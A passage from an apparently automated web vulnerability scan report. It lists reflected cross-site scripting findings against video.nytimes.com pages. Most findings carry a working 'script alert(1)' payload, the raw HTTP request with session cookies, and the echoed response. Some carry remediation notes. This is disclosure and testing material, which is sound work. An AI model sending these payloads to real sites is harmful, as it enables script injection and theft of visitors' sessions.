3.342. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d456b"><script>alert(1)</script>4e2b2b72a78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05d456b"><script>alert(1)</script>4e2b2b72a78/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:04:14 GMT
Content-type: text/html
Content-Length: 233621

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05d456b"><script>alert(1)</script>4e2b2b72a78/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html">
...[SNIP]...

3.343. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f104e"><script>alert(1)</script>7bab6680e78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html?f104e"><script>alert(1)</script>7bab6680e78=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:58:09 GMT
Content-type: text/html
Content-Length: 229421

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html?f104e"><script>alert(1)</script>7bab6680e78=1">
...[SNIP]...

3.344. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a18"><script>alert(1)</script>2f470b8f22e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201070a18"><script>alert(1)</script>2f470b8f22e/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:02:02 GMT
Content-type: text/html
Content-Length: 233627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201070a18"><script>alert(1)</script>2f470b8f22e/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.345. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c0f"><script>alert(1)</script>73b777c847d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11a7c0f"><script>alert(1)</script>73b777c847d/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:03:49 GMT
Content-type: text/html
Content-Length: 233627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11a7c0f"><script>alert(1)</script>73b777c847d/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.346. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62957"><script>alert(1)</script>f0db38f5a7b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/0562957"><script>alert(1)</script>f0db38f5a7b/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:04:36 GMT
Content-type: text/html
Content-Length: 233625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/0562957"><script>alert(1)</script>f0db38f5a7b/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.347. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22d2f"%3bb95f9f79a96 was submitted in the REST URL parameter 5. This input was echoed as 22d2f";b95f9f79a96 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/11/05/sports22d2f"%3bb95f9f79a96/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:06:37 GMT
Content-type: text/html
Content-Length: 234445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytsports22d2f";b95f9f79a96";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "sports22d2f";b95f9f79a96";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.348. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d45ca"><script>alert(1)</script>a9e08a3aa5c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/sportsd45ca"><script>alert(1)</script>a9e08a3aa5c/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:06:21 GMT
Content-type: text/html
Content-Length: 234563

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/sportsd45ca"><script>alert(1)</script>a9e08a3aa5c/1248069286580/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.349. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19c1b'%3b0df69ef1813 was submitted in the REST URL parameter 5. This input was echoed as 19c1b';0df69ef1813 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/2010/11/05/sports19c1b'%3b0df69ef1813/1248069286580/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:07:54 GMT
Content-type: text/html
Content-Length: 234325

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
f%20Zenyatta%27s%20career.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'sports19c1b';0df69ef1813' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
...[SNIP]...

3.350. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32eb"><script>alert(1)</script>e1266278a7b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/sports/1248069286580a32eb"><script>alert(1)</script>e1266278a7b/zenyatta-competes-at-the-breeders-cup.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:10:12 GMT
Content-type: text/html
Content-Length: 233627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/sports/1248069286580a32eb"><script>alert(1)</script>e1266278a7b/zenyatta-competes-at-the-breeders-cup.html">
...[SNIP]...

3.351. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7b96"><script>alert(1)</script>eed56d5ef11 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.htmlb7b96"><script>alert(1)</script>eed56d5ef11 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:11:00 GMT
Content-type: text/html
Content-Length: 234486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.htmlb7b96"><script>alert(1)</script>eed56d5ef11">
...[SNIP]...

3.352. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8480"><script>alert(1)</script>c70f747ab3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html?c8480"><script>alert(1)</script>c70f747ab3f=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:58:43 GMT
Content-type: text/html
Content-Length: 234398

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html?c8480"><script>alert(1)</script>c70f747ab3f=1">
...[SNIP]...

3.353. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/08/business/media/1248069229412/chinese-animation-.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a936"><script>alert(1)</script>2e4b7e8b2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/20103a936"><script>alert(1)</script>2e4b7e8b2c/11/08/business/media/1248069229412/chinese-animation-.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
